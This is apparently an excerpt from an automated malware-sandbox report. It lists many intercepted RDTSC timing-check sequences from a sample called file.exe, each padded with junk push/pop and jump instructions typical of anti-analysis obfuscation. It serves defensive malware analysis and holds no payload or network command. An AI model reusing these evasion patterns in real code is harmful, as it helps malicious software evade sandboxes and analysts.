                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBE866 second address: DBE88D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b push ecx 0x0000000c push eax 0x0000000d pop eax 0x0000000e jmp 00007F1228D24AC4h 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBE88D second address: DBE893 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBE893 second address: DBE8D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jnl 00007F1228D24AE0h 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 pop eax 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 push edx 0x00000016 pop edx 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2154F second address: D215A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F122870CBD4h 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d pop eax 0x0000000e push ebx 0x0000000f pushad 0x00000010 popad 0x00000011 pop ebx 0x00000012 popad 0x00000013 pushad 0x00000014 jmp 00007F122870CBD3h 0x00000019 jmp 00007F122870CBD3h 0x0000001e pushad 0x0000001f jp 00007F122870CBC6h 0x00000025 jp 00007F122870CBC6h 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBDB65 second address: DBDB71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F1228D24AB6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBDB71 second address: DBDB79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBDB79 second address: DBDB80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBDB80 second address: DBDB86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBDB86 second address: DBDB90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F1228D24AB6h 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBDB90 second address: DBDBB7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F122870CBD2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push ebx 0x0000000f pushad 0x00000010 popad 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 jnc 00007F122870CBC6h 0x0000001a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBDBB7 second address: DBDBC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBDBC7 second address: DBDBDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F122870CBD1h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBDD58 second address: DBDD74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jng 00007F1228D24AB6h 0x0000000c jmp 00007F1228D24ABEh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBDFD9 second address: DBDFF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F122870CBC6h 0x0000000a je 00007F122870CBC6h 0x00000010 popad 0x00000011 pushad 0x00000012 push edi 0x00000013 pop edi 0x00000014 jc 00007F122870CBC6h 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBDFF7 second address: DBE018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F1228D24AC8h 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBE018 second address: DBE01C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC463D second address: DC4643 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC4643 second address: DC4649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC4649 second address: DC4652 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC47B9 second address: DC47BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC47BD second address: DC47E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1228D24AC8h 0x0000000b pushad 0x0000000c jne 00007F1228D24AB6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC4EA7 second address: DC4EAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC4EAB second address: DC4EB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC5165 second address: DC5195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F122870CBC6h 0x0000000a jmp 00007F122870CBD5h 0x0000000f popad 0x00000010 pushad 0x00000011 jnc 00007F122870CBC6h 0x00000017 push eax 0x00000018 pop eax 0x00000019 je 00007F122870CBC6h 0x0000001f popad 0x00000020 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC5195 second address: DC51A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1228D24ABAh 0x00000007 js 00007F1228D24ABCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC56EA second address: DC56F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC56F2 second address: DC56F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC5F7B second address: DC5F84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC5F84 second address: DC5F8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC5F8A second address: DC5F95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC5F95 second address: DC5FAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1228D24ABFh 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC627A second address: DC627E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC627E second address: DC629B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F1228D24AC2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCA062 second address: DCA066 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCA1D8 second address: DCA1E4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1228D24AB6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCA34D second address: DCA353 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCA353 second address: DCA372 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1228D24AB6h 0x00000008 jmp 00007F1228D24AC1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCA372 second address: DCA37C instructions: 0x00000000 rdtsc 0x00000002 js 00007F122870CBC6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCA4E2 second address: DCA4FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jo 00007F1228D24AB6h 0x0000000c jne 00007F1228D24AB6h 0x00000012 jno 00007F1228D24AB6h 0x00000018 popad 0x00000019 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCA7CB second address: DCA7D5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F122870CBC6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCA8FF second address: DCA90E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007F1228D24AB6h 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCF3E0 second address: DCF3E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCF3E4 second address: DCF3EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD6B47 second address: DD6B4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD6B4D second address: DD6B58 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 pop esi 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD6B58 second address: DD6B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD6B60 second address: DD6B71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F1228D24AB8h 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD6B71 second address: DD6B81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F122870CBC6h 0x0000000a jnl 00007F122870CBC6h 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD4C9A second address: DD4CA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD4CA0 second address: DD4CA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD4CA5 second address: DD4CE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1228D24AC0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F1228D24ABDh 0x0000000f pushad 0x00000010 jmp 00007F1228D24AC6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD4E45 second address: DD4E4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD5262 second address: DD526E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD5558 second address: DD5566 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F122870CBCAh 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD59BC second address: DD59D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1228D24AC1h 0x00000009 pop edx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD59D9 second address: DD59F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F122870CBC6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F122870CBCCh 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD59F2 second address: DD59F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD5B56 second address: DD5B6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F122870CBCCh 0x0000000c jnc 00007F122870CBC6h 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD5B6F second address: DD5B92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1228D24AC5h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007F1228D24AB6h 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD5B92 second address: DD5B96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDE15C second address: DDE162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDE162 second address: DDE188 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F122870CBC6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F122870CBD5h 0x00000011 pushad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D30799 second address: D307A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1228D24ABAh 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D307A7 second address: D307B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D307B5 second address: D307CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F1228D24AC1h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDDB37 second address: DDDB50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F122870CBD5h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDDB50 second address: DDDB56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDDB56 second address: DDDB70 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F122870CBD2h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDDB70 second address: DDDB81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F1228D24AB6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDDB81 second address: DDDB97 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F122870CBC6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jp 00007F122870CBC6h 0x00000016 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1C3EE second address: D1C3FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1228D24ABDh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF38B6 second address: DF38EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F122870CBD1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F122870CBC6h 0x00000013 jmp 00007F122870CBD6h 0x00000018 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF35E9 second address: DF35ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF35ED second address: DF35F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF35F5 second address: DF3600 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F1228D24AB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF3600 second address: DF3606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF81FB second address: DF8206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F1228D24AB6h 0x0000000a pop eax 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF8206 second address: DF820E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF820E second address: DF8222 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F1228D24AC2h 0x0000000c je 00007F1228D24AB6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF8222 second address: DF8248 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F122870CC00h 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jmp 00007F122870CBD6h 0x00000015 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF8248 second address: DF824E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E00020 second address: E00029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E02C24 second address: E02C28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E02C28 second address: E02C2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0923B second address: E0924B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F1228D24AB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0924B second address: E09255 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F122870CBC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E09255 second address: E09269 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F1228D24ABFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E09269 second address: E09292 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F122870CBCDh 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F122870CBCFh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E09292 second address: E09296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E09296 second address: E092B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F122870CBCEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F122870CBCEh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E092B0 second address: E092B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0941B second address: E0941F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0941F second address: E09437 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1228D24ABEh 0x00000007 jc 00007F1228D24AB6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E09437 second address: E0943D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0943D second address: E09441 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E095E5 second address: E095FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F122870CBC6h 0x00000009 push esi 0x0000000a pop esi 0x0000000b jns 00007F122870CBC6h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 push edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
